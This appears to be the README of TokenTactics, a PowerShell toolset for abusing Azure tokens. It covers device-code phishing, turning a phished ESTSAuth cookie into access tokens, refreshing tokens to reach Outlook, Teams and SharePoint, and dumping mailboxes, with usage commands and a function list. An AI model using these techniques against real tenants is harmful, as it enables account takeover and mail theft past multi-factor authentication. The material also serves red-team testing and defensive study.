Azure JSON Web Token ("JWT") Manipulation Toolset
Azure access tokens allow you to authenticate to certain endpoints as a user who signs in with a device code. Even if they used multi-factor authentication. Once you have a user's access token, it may be possible to access certain apps such as Outlook, SharePoint, OneDrive, MSTeams and more.
For instance, if you have a Graph or MSGraph token, you can then connect to Azure and dump users, groups, etc. You could then, depending on conditional access policies, switch to an Azure Core Management token and run AzureHound. Then, switch to an Outlook token and read/send emails or MS Teams and read/send messages!
For more on Azure token types Microsoft identity platform access tokens
There are some example requests to endpoints in the resources folder. There is also an example phishing template for device code phishing.
You may also use these tokens with AAD Internals as well. We strongly recommended to check this amazing tool out.
Import-Module .\TokenTactics.psd1
Get-Help Get-Azure-Token
Invoke-RefreshToSubstrateToken
Get-AzureToken -Client MSGraph
Once the user has logged in, you'll be presented with the JWT and it will be saved in the $response variable. To access the access token use $response.access_token
from your PowerShell window to display the token. You may also display the refresh token with $response.refresh_token
. Hint: You'll want the refresh token to keep refreshing to new access tokens! By default, Get-AzureToken results are logged to TokenLog.log.
Get-AzureToken -Client DODMSGraph
Get-AzureTokenFromESTSCookie -estsAuthCookie "0.AbcApTk..."
This module uses authorization code flow to obtain an access token and refresh token using ESTSAuth (or ESTSAuthPersistent) cookie. Useful if you have phished a session via Evilginx or have otherwise obtained this cookie.
Be sure to use the right cookie! ESTSAuthPersistent
is only useful when a CA policy actually grants a persistent session. Otherwise, you should use ESTSAuth
. You can usually tell which one to use based on length, the longer cookie is the one you want to use :)
Note: This may not work in all cases as it may require user interaction. If this is the case, either use the Device Code flow above, or try roadtx interactiveauth --estscookie
Invoke-RefreshToOutlookToken -domain myclient.org -refreshToken 0.A
$OutlookToken.access_token
Connect-AzureAD -AadAccessToken $response.access_token -AccountId user@myclient.org
Once a PRT has been captured, auth with roadrecon to obtain your access_token and refresh_token. When refreshing with TokenTactics, use ClientID 1b730954-1685-4b74-9bfd-dac224a7b894.
Invoke-RefreshToMSGraphToken -domain myclient.org -ClientId 1b730954-1685-4b74-9bfd-dac224a7b894 -refreshToken 0.A
Invoke-ClearToken -Token All
Get-Command -Module TokenTactics
CommandType Name Version Source
----------- ---- ------- ------
Function Get-AzureToken 0.0.2 TokenTactics
Function Get-AzureTokenFromESTSCookie 0.0.2 TokenTactics
Function Invoke-ClearToken 0.0.2 TokenTactics
Function Invoke-DumpOWAMailboxViaMSGraphApi 0.0.2 TokenTactics
Function Invoke-ForgeUserAgent 0.0.2 TokenTactics
Function Invoke-OpenOWAMailboxInBrowser 0.0.2 TokenTactics
Function Invoke-ParseJWTtoken 0.0.2 TokenTactics
Function Invoke-RefreshToAzureCoreManagementToken 0.0.2 TokenTactics
Function Invoke-RefreshToAzureManagementToken 0.0.2 TokenTactics
Function Invoke-RefreshToDODMSGraphToken 0.0.2 TokenTactics
Function Invoke-RefreshToGraphToken 0.0.2 TokenTactics
Function Invoke-RefreshToMAMToken 0.0.2 TokenTactics
Function Invoke-RefreshToMSGraphToken 0.0.2 TokenTactics
Function Invoke-RefreshToMSManageToken 0.0.2 TokenTactics
Function Invoke-RefreshToMSTeamsToken 0.0.2 TokenTactics
Function Invoke-RefreshToOfficeAppsToken 0.0.2 TokenTactics
Function Invoke-RefreshToOfficeManagementToken 0.0.2 TokenTactics
Function Invoke-RefreshToOutlookToken 0.0.2 TokenTactics
Function Invoke-RefreshToSharepointOnlineToken 0.0.2 TokenTactics
Function Invoke-RefreshToSubstrateToken 0.0.2 TokenTactics
Function Invoke-RefreshToYammerToken 0.0.2 TokenTactics
- @0xBoku co-author and researcher.
TokenTactic's methods are highly influenced by the great research of Dr Nestori Syynimaa at https://o365blog.com/.